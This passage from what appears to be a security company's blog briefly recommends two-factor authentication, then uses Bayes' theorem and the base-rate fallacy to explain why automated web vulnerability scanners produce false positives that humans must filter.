Now you may be saying, ‘That sounds great! Where do I sign up?’ Unfortunately, not all systems support two-factor authentication, though the industry is slowly moving that way. Sometimes it isn’t enabled by default, but it’s available as an option in a ‘settings’ or ‘account’ menu on the site, and there are websites devoted to tracking which popular services support two-factor auth. I highly recommend turning it on for any account that supports it. Typically it’s quick and easy to do, and it will make your accounts far more secure than ever before.

Bayes’ Theorem and What We Do

Back in 2012, The Atlantic Monthly published a behind-the-scenes article about Google Maps. This is the passage that struck me:

The best way to figure out if you can make a left turn at a particular intersection is still to have a person look at a sign — whether that’s a human driving or a human looking at an image generated by a Street View car.

There is an analogy to be made to one of Google’s other impressive projects: Google Translate. What looks like machine intelligence is actually only a recombination of human intelligence. Translate relies on massive bodies of text that have been translated into different languages by humans; it then is able to extract words and phrases that match up. The algorithms are not actually that complex, but they work because of the massive amounts of data (i.e. human intelligence) that go into the task on the front end.

Google Maps has executed a similar operation. Humans are coding every bit of the logic of the road onto a representation of the world so that computers can simply duplicate (infinitely, instantly) the judgments that a person already made…

…I came away convinced that the geographic data Google has assembled is not likely to be matched by any other company. The secret to this success isn’t, as you might expect, Google’s facility with data, but rather its willingness to commit humans to combining and cleaning data about the physical world. Google’s map offerings build in the human intelligence on the front end, and that’s what allows its computers to tell you the best route from San Francisco to Boston.

Even for Google, massive and sophisticated automation is only a first step. Human judgment is also an unavoidable part of documenting web application vulnerabilities. The reason isn’t necessarily obvious: Bayes’ theorem.

P(A|B) = P(B|A) × P(A) / P(B)

“P(A|B)” means “the probability of A, given B.”

Wikipedia explains the concept in terms of drug testing:

Suppose a drug test is 99% sensitive and 99% specific. That is, the test will produce 99% true positive results for drug users and 99% true negative results for non-drug users. Suppose that 0.5% of people are users of the drug. If a randomly selected individual tests positive, what is the probability he or she is a user?

P(user | positive) = P(positive | user) × P(user) / P(positive)
= (0.99 × 0.005) / (0.99 × 0.005 + 0.01 × 0.995)
≈ 0.33

The reason the correct answer of 33% is counter-intuitive is called base rate neglect. If you have a very accurate test for something that happens infrequently, that test will usually report false positives. That’s worth repeating: if you’re looking for a needle in a haystack, the best possible tests will usually report false positives.

Filtering out false positives is an important part of our service, over and above the scanning technology itself. Because most URLs aren’t vulnerable to most things, we see a lot of false positives. They’re the price of automated scanning.

We also see a lot of duplicates. A website might have a search box on every page that’s vulnerable to cross-site scripting, but it’s not helpful to get a security report that’s more or less a list of the pages on your website. It is helpful to be told there’s a problem with the search box. Once.

Machine learning is getting better every day, but we don’t have time to wait for computers to read and understand websites as well as humans. Here and now, we need to find vulnerabilities, and scanners can cover a site more efficiently than a human. Unfortunately, false positives are an unavoidable part of that.

Someone has to sort them out. When everything is working right, that part of our service is invisible, just like the people hand-correcting Google Maps.